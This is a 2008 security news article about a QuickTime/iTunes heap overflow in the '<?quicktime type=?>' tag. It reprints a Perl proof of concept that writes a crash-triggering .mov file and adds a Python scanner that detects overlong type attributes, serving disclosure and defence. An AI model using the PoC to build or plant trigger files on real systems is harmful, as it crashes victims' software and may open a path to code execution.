QuickTime 0day exploit code released, may allow arbitrary code execution
Source: 岁月联盟
Date: 2008-09-22
The overflow PoC exploits a vulnerability in QuickTime's handling of the <? quicktime type= ?> parameter: an overlong string in that parameter is not handled correctly.
At present the program only crashes QuickTime, but the problem is more serious than that. The program implies that the vulnerability could lead to arbitrary code execution, which would be a serious security risk, because an attacker could embed a malicious file in a web page to trigger it.
However, even the publisher is not entirely sure: the milw0rm.com posting says it "may" allow arbitrary code execution.
Symantec is currently investigating the vulnerability to obtain more technical details.
Workaround: users should consider temporarily disabling the QuickTime plugin. The plugin is installed on many computers running Windows and is installed by default on every Mac.
Compiled by cnBeta
Exploit (PoC):
###############################################################################
# Quicktime 7.5.5 / iTunes 8.0 Remote Heap Overflow Crash
# Vendor: http://www.apple.com/
# Risk : high
#
# The "<? quicktime type= ?>" tag fails to handle long strings, which can lead to a heap overflow in the Quicktime/iTunes media player.
# This bug can be remote or local: Quicktime/iTunes parse any supplied file for a recognized header even if the header does not correspond
# to the file type, so you can put some XML in a mp4, mov, etc. and open it with Quicktime, or you can do the same in an HTML page, leading to a
# remote crash in Firefox, IE and any browser using the Quicktime plugin.
# Code execution may be possible.
###############################################################################
use strict;
use warnings;

# The payload is a QuickTime media link (QTL) XML document. The "type" attribute
# carries the expected MIME type followed by 242 bytes of space padding; that
# overlong attribute value is what triggers the crash.
my $padding = " " x 242;
my $payload =
    "<?xml version=\"1.0\"?>\r\n" .
    "<?quicktime type=\"application/x-quicktime-media-link" . $padding . "\"?>\r\n" .
    "<embed src=\"rtsp://nosite.com/novidz.mov\" autoplay=\"whatever\" />\x00";

# Write the bytes to a .mov file; QuickTime ignores the extension and parses the XML header anyway.
my $filename = "crash.mov";
open(my $fh, ">", $filename) or die "Cannot open $filename: $!";
binmode($fh);    # keep \r\n and the trailing NUL byte intact on Windows
print $fh $payload;
close($fh);
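The article and the PoC header above make two points a defender can act on: QuickTime locates the QTL XML header by content rather than by file extension, and the trigger is an overlong value in the <?quicktime type="..."?> processing instruction. The scanner below, an added example that is neither the PoC author's code nor anything from Apple, applies exactly that logic: it searches raw bytes for the processing instruction and flags any type attribute longer than a sane MIME-type length. The 64-byte threshold, the permissive (case-insensitive, whitespace-tolerant) regex, and all sample files are assumptions constructed for this example; the crash sample reproduces the PoC's shape (34-byte MIME type plus 242 bytes of padding).

```python
import re

# QuickTime parses any file for a recognized header, so match on raw bytes, not
# on extension. The regex is deliberately permissive (assumption: QuickTime may
# tolerate case and whitespace variations such as "<? quicktime type= ?>").
QT_PI_RE = re.compile(rb'<\?\s*quicktime\s+type\s*=\s*"([^"]*)"',
                      re.IGNORECASE | re.DOTALL)

# The legitimate value seen in the PoC, "application/x-quicktime-media-link",
# is 34 bytes. 64 is an assumed detection threshold for this example.
MAX_SANE_TYPE_LEN = 64


def find_quicktime_type_attrs(data: bytes):
    """Return the value of every <?quicktime type="..."?> instruction in data."""
    return [m.group(1) for m in QT_PI_RE.finditer(data)]


def assess(data: bytes, name: str = "<buffer>"):
    """None if no QTL processing instruction is present, else a verdict dict."""
    types = find_quicktime_type_attrs(data)
    if not types:
        return None
    longest = max(len(t) for t in types)
    return {
        "name": name,
        "count": len(types),
        "longest_type_len": longest,
        "suspicious": longest > MAX_SANE_TYPE_LEN,
    }


def build_qtl(type_value: bytes,
              src: bytes = b"rtsp://nosite.com/novidz.mov") -> bytes:
    """Construct a QTL document with the given type attribute (same layout as the PoC)."""
    return (b'<?xml version="1.0"?>\r\n'
            b'<?quicktime type="' + type_value + b'"?>\r\n'
            b'<embed src="' + src + b'" autoplay="whatever" />\x00')


# Constructed samples (not real files):
BENIGN_QTL = build_qtl(b"application/x-quicktime-media-link")
# Same padding length as the PoC payload, saved under a .mov name.
CRASH_MOV = build_qtl(b"application/x-quicktime-media-link" + b" " * 242)
# The PoC notes the same XML inside an HTML page crashes the browser plugin.
HTML_WITH_QTL = b"<html><body>hello</body></html>\n" + CRASH_MOV
# A genuine QuickTime movie header ('ftyp' atom) with no QTL instruction.
REAL_MOV_HEADER = b"\x00\x00\x00\x14ftypqt  " + b"\x00" * 64

SAMPLES = {
    "benign.qtl": BENIGN_QTL,
    "crash.mov": CRASH_MOV,
    "page.html": HTML_WITH_QTL,
    "clip.mov": REAL_MOV_HEADER,
}


def scan_samples(samples=SAMPLES):
    """Run assess() over every sample; returns {name: verdict-or-None}."""
    return {name: assess(data, name) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(name, "->", "no QTL header" if verdict is None else verdict)
```

Because the check is content-based, the same function works as a mail-gateway or proxy filter on arbitrary attachments and web responses, which is where the "embed it in a web page" attack path described in the article would be seen first.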